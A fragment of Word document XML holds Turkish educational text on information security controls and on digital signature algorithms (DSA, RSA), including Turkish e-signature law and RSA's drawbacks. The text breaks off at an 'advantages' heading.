    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Arkaplan araştırması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sonuç:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bilgi güvenliği kontrolleri fiziksel, teknik veya idari olarak sınıflandırılabilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bunlar ayrıca önleyici ve dedektif kontrollere ayrılmıştır. Sergi 162.1, bu bölümde tartışılan kontrolleri listeler.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kuruluşun gizlilik, bütünlük ve kullanılabilirlik gereksinimlerini belirlemek için kuruluşun güvenlik politikası gözden geçirilmelidir. Kullanıcıların göz önünde bulundurmasını sağlamak için önleyici ve dedektif kontrol önlemleri arasında dikkatli bir denge kurulması gerekmektedir. Güvenlik kontrolleri makul ve kontrollerin verimliliği aşırı derecede engellememesini sağlamak. Belirli bir bilgisayar ortamına en uygun fiziksel, teknik ve idari kontrollerin kombinasyonu, nicel bir risk analizi yapılarak belirlenebilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu genellikle pahalı, sıkıcı ve sübjektif bir süreç olduğu için, ancak gerekli bakım standardını karşılama olarak adlandırılan alternatif bir yaklaşım sıklıkla kullanılır. Uygun bakım standardını karşılayan kontroller, benzer koşullar veya ortamlarda çoğu kuruluş tarafından sağduyulu sayılabilecek kontrollerdir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Uygun bakım standardını karşılayan kontroller genellikle makul bir maliyet için hazırdır ve kuruluşun güvenlik politikasını destekler; en azından bireysel hesap verebilirlik, denetlenebilirlik ve görevlerin ayrılmasını sağlayan kontrolleri içerir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> İmzalama Algoritmaları</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>DSA, ECDSA, RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Özet:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bildiğiniz üzere günlük hayatta pek çok belgeye imzamızı atarız.Bazen bankada hesap açtırmak için , bazen bir bedel karşılığında hizmet almak bu işlemi tekrarlarız. Belgede imzamızın bulunması, ilgili işlemin </w:t>
      </w:r>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:rStyle w:val="Gl"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>bizim tarafımızdan</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> yapıldığını kanıtlar. Elektronik ortamda ise bunun yerine dijital imza kullanılır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dijital imza, kimlik doğrulama amacı güden imzanın elektronik ortamdaki hali olup, elektronik ortamlarda imza yerine kullanılabilen yasal kimlik doğrulama sistemidir[5]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5EB6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Giriş:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dijital imzanın</w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ıslak imzadan farkı </w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:rStyle w:val="Gl"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>belgenin içeriğine göre değişmesidir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Bir başka deyişle</w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> e-imza sabit bir imza değildir</w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İmzalanan mesaja göre benzersiz bir şekilde değişir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ülkemizde dijital imza 5070 sayılı kanun ile </w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:rStyle w:val="Vurgu"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:rStyle w:val="Gl"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Başka bir elektronik veriye eklenen veya elektronik veriyle mantıksal bağlantısı bulunan ve kimlik doğrulama amacıyla kullanılan elektronik veri</w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:rStyle w:val="Vurgu"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>” </w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>şeklinde tanımlanmıştır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000877E1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DSA algoritması da, RSA gibi açık anahtarlı bir kriptografik algoritmadır. RSA’dan farkı sadece imzalama amaçlı kullanılabilmesi, şifreleme yapılamamasıdır. DSA,  sayısal  imza  standardı  olarak  yayınlanmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000877E1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hem şifreleme hem de sayısal imza atma olanağı tanıyan açık anahtarlı bir kriptografik yapıdır[3]. RSA, bir asimetrik şifreleme algoritmasıdır. Asimetrik şifreleme yönteminde genel anahtar ve özel anahtar olmak üzere iki anahtar bulunur. Genel anahtar herkese açıktır. Özel anahtar ise kişiye özeldir ve sadece sahibi tarafından bilinir[1].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dezavantajları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RSA algoritmasının en büyük dezavantajı, asimetrik bir şifreleme algoritması olması ve büyük sayılarla işlem yapması nedeniyle yavaş olmasıdır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Özellikle kablosuz ağ sistemlerinde bu algoritmanın kullanılması bazı sorunlara yol açabilir. Çünkü ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:r w:rsidRPr="000877E1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> genişliğini fazlaca tüketir ve sistemi yavaşlatarak performans düşüşüne neden olur[2].</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00787">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RSA, güvenilirliği çok büyük tam sayılarla işlem yapmanın zorluğuna dayanan bir şifreleme tekniğidir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F00787">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Güvenilirlik derecesi, şifrelemede kullanılan asal sayıların büyüklüğü ile orantılıdır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00787">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Avanyajları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
